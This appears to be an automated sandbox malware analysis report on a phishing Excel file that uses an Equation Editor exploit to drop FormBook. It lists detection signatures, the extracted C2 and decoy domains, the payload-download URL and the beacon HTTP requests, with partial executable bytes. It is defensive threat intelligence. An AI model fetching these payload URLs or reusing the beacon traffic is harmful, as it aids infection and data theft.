Windows Analysis Report New order - C.S.I No. 04183.xlsx

Overview

General Information

Sample Name: New order - C.S.I No. 04183.xlsx
Analysis ID: 528788
MD5: bc2d171f6ea23a58ce5cca820869295c
SHA1: dafd3a3276c12ee6d20206573d65d6fb10e6af7b
SHA256: 408c41f67cc40208f1518b050db8b6d0f315dae817e26c5ae43efe917506c226
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.celikkaya.xyz/og2w/"], "decoy": ["drivenexpress.info", "pdfproxy.com", "zyz999.top", "oceanserver1.com", "948289.com", "nubilewoman.com", "ibizadiamonds.com", "bosniantv-australia.com", "juliehutzell.com", "poshesocial.events", "icsrwk.xyz", "nap-con.com", "womansslippers.com", "invictusfarm.com", "search-panel-avg-rock.rest", "desencriptar.com", "imperialexoticreptiles.com", "agastify.com", "strinvstr.com", "julianapeloi.com", "myproperty99.com", "mahardikasantoso.com", "pathway-strategies.com", "runbusinessonline.com", "facenbook.xyz", "texasschnauzer.com", "whoyummy.top", "hiscomsvc.com", "644557.com", "shouyeshow.com", "emtek.site", "inspireabossglobal.us", "sellmyhouse365.net", "ambergrids.xyz", "shoptrendyshop.com", "b7eb8.com", "crystalsbyzoe.com", "awfullive.site", "rebelgreens.com", "depressiqwidv.xyz", "mvp69bet.com", "selectedandprotected.com", "china-jiahe.com", "brandonknicely.com", "redrodventuresllc.com", "tomafer.net", "makemeorgasm.net", "wihomeoffers.com", "bamko.link", "secure-01.net", "fridayhabit.com", "mudeevehkuwpitcicet.site", "inversioneskomp.com", "oojry.xyz", "jibony.com", "cellphoneplansiusaweb.com", "lianemuhill.com", "caroeventos.com", "thucphamsachkhaihuy.com", "musicjem.com", "hbbtv.xyz", "meltemilebaskalasim.com", "xn--38j0b6c.com", "checkupfromtheneckup.net"]}
Multi AV Scanner detection for submitted file
Source: New order - C.S.I No. 04183.xlsx Virustotal: Detection: 36% Perma Link
Source: New order - C.S.I No. 04183.xlsx ReversingLabs: Detection: 36%
Yara detected FormBook
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://103.171.1.140/384500000_1/.vbc.exe Avira URL Cloud: Label: malware
Source: http://www.oojry.xyz/og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MN Avira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URL
Source: http://103.171.1.140/384500000_1/.vbc.exe Virustotal: Detection: 8% Perma Link
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nssE7A3.tmp\folvcfp.dll Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.vbc[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.vbc.exe.2980000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.cscript.exe.3e22f0.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.vbc.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.vbc.exe.400000.0.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 5.0.vbc.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.cscript.exe.2a4f840.7.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.vbc.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.1.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.459887685.00000000002B0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.495263706.00000000008C0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.460925066.00000000005B0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000007.00000003.494990015.00000000004B0000.00000004.00000001.sdmp, cscript.exe, 00000007.00000002.663624666.0000000002490000.00000040.00000001.sdmp, cscript.exe, 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, cscript.exe, 00000007.00000003.495952417.0000000002180000.00000004.00000001.sdmp
Source: Binary string: cscript.pdbN source: vbc.exe, 00000005.00000002.495021937.00000000004C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.495522303.0000000002360000.00000040.00020000.sdmp
Source: Binary string: cscript.pdb source: vbc.exe, 00000005.00000002.495021937.00000000004C9000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.495522303.0000000002360000.00000040.00020000.sdmp
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 4_2_00405250
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405C22 FindFirstFileA,FindClose, 4_2_00405C22
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402630 FindFirstFileA, 4_2_00402630

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.oojry.xyz
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_00416CDC
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_1_00416CDC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4x nop then pop edi 7_2_00086CDC
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.171.1.140:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 103.171.1.140:80

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 104.21.82.75 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.oojry.xyz
Source: C:\Windows\explorer.exe Domain query: www.crystalsbyzoe.com
Source: C:\Windows\explorer.exe Network Connect: 34.246.239.131 80 Jump to behavior
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.oojry.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.celikkaya.xyz/og2w/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MN HTTP/1.1Host: www.oojry.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /og2w/?6lRd8=HRVKk55HqKhUKEplYc9Y+k8lMJF7Npxc0OkeINx2Urv2TzIY5LS2Gl5mjz9S2np0K2vYIQ==&kjiDz=mH9p98O8MN HTTP/1.1Host: www.crystalsbyzoe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 18:23:23 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31Last-Modified: Thu, 25 Nov 2021 04:13:29 GMTETag: "7431e-5d195326272a0"Accept-Ranges: bytesContent-Length: 475934Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cd cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 84 02 00 00 04 00 00 e3 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 74 00 00 b4 00 00 00 00 70 03 00 70 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 5b 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c 12 00 00 00 70 00 00 00 14 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 5c 02 00 00 90 00 00 00 04 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 70 a0 02 00 00 70 03 00 00 a2 02 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /384500000_1/.vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.171.1.140Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlDate: Thu, 25 Nov 2021 18:25:03 GMTServer: nginxVary: Accept-EncodingContent-Length: 159Connection: CloseData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 37 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.17.8.2</center></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: unknown TCP traffic detected without corresponding DNS query: 103.171.1.140
Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, vbc.exe, 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.452164123.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.456325593.0000000000409000.00000008.00020000.sdmp, cscript.exe, 00000007.00000002.662137853.00000000003E2000.00000004.00000020.sdmp, cscript.exe, 00000007.00000002.664107030.0000000002A4F000.00000004.00020000.sdmp, vbc.exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000004.00000002.460060612.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.452164123.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.456325593.0000000000409000.00000008.00020000.sdmp, cscript.exe, 00000007.00000002.662137853.00000000003E2000.00000004.00000020.sdmp, cscript.exe, 00000007.00000002.664107030.0000000002A4F000.00000004.00020000.sdmp, vbc.exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.460925323.0000000002140000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.473837020.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.484932398.0000000003E50000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.662313228.0000000001E70000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.500166360.0000000001E70000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.460925323.0000000002140000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.473837020.0000000001BE0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.483035833.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.478190535.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.478068609.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.469685487.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.480261160.0000000008438000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.531572707.0000000004513000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.478068609.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.480261160.0000000008438000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.475414303.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000006.00000000.527587119.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.473549463.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.481695686.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.462632682.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4C56E6BA.emf Jump to behavior
Source: unknown DNS traffic detected: queries for: www.oojry.xyz
Source: global traffic HTTP traffic detected: GET /384500000_1/.vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.171.1.140Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MN HTTP/1.1Host: www.oojry.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
